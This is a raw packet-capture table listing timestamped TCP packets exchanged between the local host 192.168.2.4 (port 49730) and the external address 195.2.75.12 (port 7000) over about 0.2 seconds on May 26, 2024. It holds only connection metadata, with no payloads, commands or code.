May 26, 2024 01:21:24.947453976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.947515011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.947662115 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.947906017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.948000908 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.948039055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.948066950 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.948075056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.948390961 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.948574066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.948611021 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.948668003 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.949028969 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.949064016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.949096918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.949167013 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.949563026 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.949600935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.949634075 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.949657917 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.949693918 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.950208902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.950242996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.950275898 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.950320959 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.950948000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.950983047 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.951045036 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.951322079 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.951355934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.951387882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.951390028 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.951447010 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.951775074 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.951808929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.951911926 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.952245951 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.952280045 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.952337027 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.952737093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.952771902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.952830076 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.953216076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.953387022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.953421116 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.953454971 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.953493118 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.953557968 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.953883886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.954086065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.954166889 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.954559088 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.954595089 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.954940081 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.955007076 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.958551884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.958612919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.958796978 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.991206884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.991749048 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.991796017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.991837978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.991875887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.991976976 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.991977930 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.991977930 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.992321014 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.992506981 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.992841005 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.992892981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.993088961 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.993127108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.993206024 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.993266106 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.993266106 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.993421078 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.993459940 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.993525028 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.993647099 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.993705988 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.994195938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.994314909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.994570017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.994606972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.994630098 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.994661093 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.995166063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.995290041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.995326042 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.995385885 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.995503902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.995573997 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.995810986 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.996109962 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.996208906 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.996258020 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.996361017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.996419907 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.997088909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.997173071 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.997387886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.997423887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.997446060 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.997478962 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.998579979 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.998663902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.998698950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.998790979 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.998822927 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.998887062 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.999038935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.999161959 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.999362946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.999418974 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.999541998 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.999603033 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.000109911 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.000147104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.000247002 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.000297070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.000582933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.000617981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.000654936 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.007009029 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.007590055 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.025209904 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.025239944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.025356054 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.025521994 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.025886059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.025913000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.025928974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.026124954 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.026141882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.026169062 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.026169062 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.026309013 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.026352882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.026371002 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.026434898 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.026585102 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.026992083 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.027126074 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.027188063 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.027333975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.027968884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.027985096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.028032064 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.028062105 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.028095007 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.028341055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.028357029 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.028394938 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.029037952 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.029159069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.029161930 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.029398918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.029417992 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.029463053 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.029824018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.029917002 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.029972076 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.030071020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.030196905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.030478954 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.030911922 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.030987978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.031162977 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.031193972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.031209946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.031250954 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.031852961 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.031995058 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.032016993 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.032115936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.032206059 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.032861948 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.032918930 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.032970905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.033176899 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.033195019 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.033251047 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.033824921 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.033883095 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.033956051 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.034092903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.034611940 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.034627914 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.034671068 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.034717083 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.034840107 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.034957886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.035027981 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.035162926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.035178900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.035242081 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.035809040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.035917044 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.036098003 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.036115885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.036127090 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.036808968 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.036865950 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.036885977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.036948919 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.037204027 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.037221909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.037275076 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.037794113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.037914991 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.038053036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.038064957 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.038232088 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.038395882 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.039519072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.039659977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.039788008 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.039846897 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.039935112 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.039989948 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.040158987 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.040286064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.040364027 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.040512085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.040529966 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.043586969 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.044482946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.044500113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.044620037 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.077291965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.077389956 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.082410097 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.082428932 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.082562923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.082627058 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.082808018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.083046913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.083230972 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.083338022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.083571911 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.083646059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.083662033 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.083723068 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.084041119 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.084058046 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.084110975 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.084192991 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.084433079 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.084450960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.084503889 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.084949017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.084966898 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.085016012 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.085124016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.085175991 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.085289001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.085863113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.085937977 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.085971117 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.086236000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.086251974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.086323023 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.086648941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.086705923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.086777925 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.086900949 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.087107897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.087171078 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.087744951 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.087815046 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.087886095 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.088068008 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.088084936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.088171005 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.088661909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.088776112 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.088779926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.088798046 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.088866949 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.088927984 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.089417934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.089504957 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.089633942 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.089752913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.089768887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.089785099 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.089806080 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.089854002 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.091413021 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.091640949 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.091698885 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.091761112 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.096349001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.096637964 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.115864992 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.115891933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.116039991 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.116105080 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.116244078 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.116328001 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.116508007 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.116524935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.116540909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.116584063 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.116873026 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.116930008 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.117141008 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.117157936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.117330074 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.117388010 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.117583036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.117600918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.117615938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.117634058 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.117675066 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.118010044 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.118244886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.118535995 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.118555069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.118571043 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.118594885 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.118633032 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.119148016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.119203091 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.119312048 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.119565010 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.119580984 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.119597912 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.119637966 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.119668007 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.119956970 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.120187044 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.120254040 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.120457888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.120474100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.120490074 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.120527983 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.121054888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.121157885 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.121321917 CEST	7000	49730	195.2.75.12	192.168.2.4
